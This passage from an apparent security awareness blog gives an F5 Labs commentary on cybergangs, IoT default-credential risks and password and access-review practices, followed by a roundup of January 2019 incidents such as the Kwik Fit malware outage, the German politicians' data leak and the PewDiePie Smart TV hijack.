This includes the ability to write their own tools or enhance the capabilities of others. In many ways, it is a similar path to that of an intern. They often become part of sophisticated groups or operations once their abilities reach a certain level. Indeed, a large proportion of hackers are relatively new entrants to the cybercrime game and still use low-level tools to wreak havoc. This breed of cybercriminal isn’t always widely feared by big corporations. They should be.

How Cybergangs are using Technology to Work Smarter and Cheaper

Cybergangs often work remotely across widely dispersed geographies, which makes them tricky to detect and deal with. The nature of these structures also means that cyber attacks are becoming more automated, rapid and cost-effective. The costs and risks are further reduced when factoring in the fluidity and inherent anonymity of cryptocurrencies and the dark web.

The industry has become so robust that hackers can even source work on each link in an attack chain at an affordable rate. Each link is anonymous to other threat actors in the chain to vastly reduce the risk of detection.

IoT Vulnerabilities on the Rise
According to IHS Markit, there will be 125 billion IoT devices on the planet by 2030.  With so much hype surrounding the idea of constant and pervasive connectivity, individuals and businesses are often complacent when it comes to ensuring all devices are secure. 

Significantly, it is easier to compromise an IoT device that is exposed to the public Internet and protected with known vendor default credentials than it is to trick an individual into clicking on a link in a phishing email.

Consequently, it is crucial for organisations to have an IoT strategy in place that encompasses the monitoring and identification of traffic patterns for all connected devices. Visibility is essential to understand network behaviour and any potential suspicious activities that may occur on it.

Why Cybersecurity Mindsets must Change

IT teams globally have been lecturing staff for years on the importance of creating different passwords. Overall, the message is not resonating enough.

To combat the issue, businesses need to consider alternative tactics such as password manager applications, as well as ensuring continuous security training is available and compulsory for all staff.

It is worth noting that the most commonly attacked credentials are the vendor defaults for some of the most commonly used applications in enterprise environments. Simply having a basic system hardening policy that ensures vendor default credentials are disabled or changed before the system goes live will prevent this common issue from becoming a painful breach. System hardening is a requirement in every best practice security framework or compliance requirement.

Ultimately, someone with responsibility for compliance, audit, or security should be continually reviewing access to all systems. Commonly, security teams will only focus on systems within the scope of some compliance or regulatory obligation. This can lead to failure to review seemingly innocuous systems that can occasionally result in major breaches.

In addition to continual access reviews, monitoring should be in place to detect access attacks. Brute force attacks can not only lead to a breach, they can also result in performance impacts on the targeted system or lock customers out of their accounts. As a result, there are significant financial incentives for organisations to equip themselves with appropriate monitoring procedures.

Cybergangs use many different methods to wreak havoc, making it increasingly difficult to identify attacks in a timely manner. Businesses are often ignorant about the size of attacks, the scope of what has been affected, and the scale of the operation behind them. You are operating in the dark without doing the utmost to know your enemy. Failing to do so will continue to put information, staff and customers at risk by allowing cybergangs to operate in the shadows.
David Warburton, Senior Threat Research Evangelist with F5 Labs with over 20 years’ experience in IT and security.

Cyber Security Roundup for January 2019

The first month of 2019 was a relatively slow month for cyber security in comparison with the steady stream of cyber attacks and breaches throughout 2018.  On Saturday 26th January, car services and repair outfit Kwik Fit told customers its IT systems had been taken offline due to malware, which disputed its ability to book in car repairs. Kwik Fit didn't provide any details about the malware, but it is fair to speculate that the malware outbreak was likely caused by a general lack of security patching and anti-virus protection as opposed to anything sophisticated.

B&Q said it had taken action after a security researcher found and disclosed details of B&Q suspected store thieves online. According to Ctrlbox Information Security, the exposed records included 70,000 offender and incident logs, which included: the first and last names of individuals caught or suspected of stealing goods from stores descriptions of the people involved, their vehicles and other incident-related information the product codes of the goods involved the value of the associated loss.

Hundreds of German politicians, including Chancellor Angela Merkel, have had personal details stolen and published online at the start of January.  A 20 year suspect was later arrested in connection to this disclosure. Investigators said the suspect had acted alone and had taught himself the skills he needed using online resources, and had no training in computer science. Yet another example of the low entry level for individuals in becoming a successful and sinister hacker.

Hackers took control of 65,000 Smart TVs around the world, in yet another stunt to support YouTuber PewDiePie. A video message was displayed on the vulnerable TVs which read "Your Chromecast/Smart TV is exposed to the public internet and is exposing sensitive information about you!" It then encourages victims to visit a web address before finishing up with, "you should also subscribe to PewDiePie"
Hacked Smart TVs: The Dangers of Exposing Smart TVs to the Net

The PewDiePie hackers said they had discovered a further 100,000 vulnerable devices, while Google said its products were not to blame, but were said to have fixed them anyway. In the previous month two hackers carried out a similar stunt by forcing thousands of printers to print similar messages. There was an interesting video of the negative impact of that stunt on the hackers on the BBC News website - The PewDiePie Hackers: Could hacking printers ruin your life?

Security company ForeScout said it had found thousands of vulnerable devices using search engines Shodan and Cenys, many of which were located in hospitals and schools. Heating, ventilation, and air conditioning (HVAC) systems were among those that the team could have taken control over after it developed its own proof-of-concept malware.

Reddit users found they were locked out of their accounts after an apparent credential stuffing attack forced a mass password invoke by Reddit in response. A Reddit admin said "large group of accounts were locked down" due to anomalous activity suggesting unauthorised access."

Kaspersky reported that 30 million cyber attacks were carried out in the last quarter of 2018, with cyber attacks via web browsers reported as the most common method for spreading malware.

A new warning was issued by Action Fraud about a convincing TV Licensing scam phishing email attack made the rounds. The email attempts to trick people with subject lines like "correct your licensing information" and "your TV licence expires today" to convince people to open them. TV Licensing warned it never asks for this sort of information over email.

January saw further political pressure and media coverage about the threat posed to the UK national security by Chinese telecoms giant Huawei, I'll cover all that in a separate blog post.


BLOG
NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS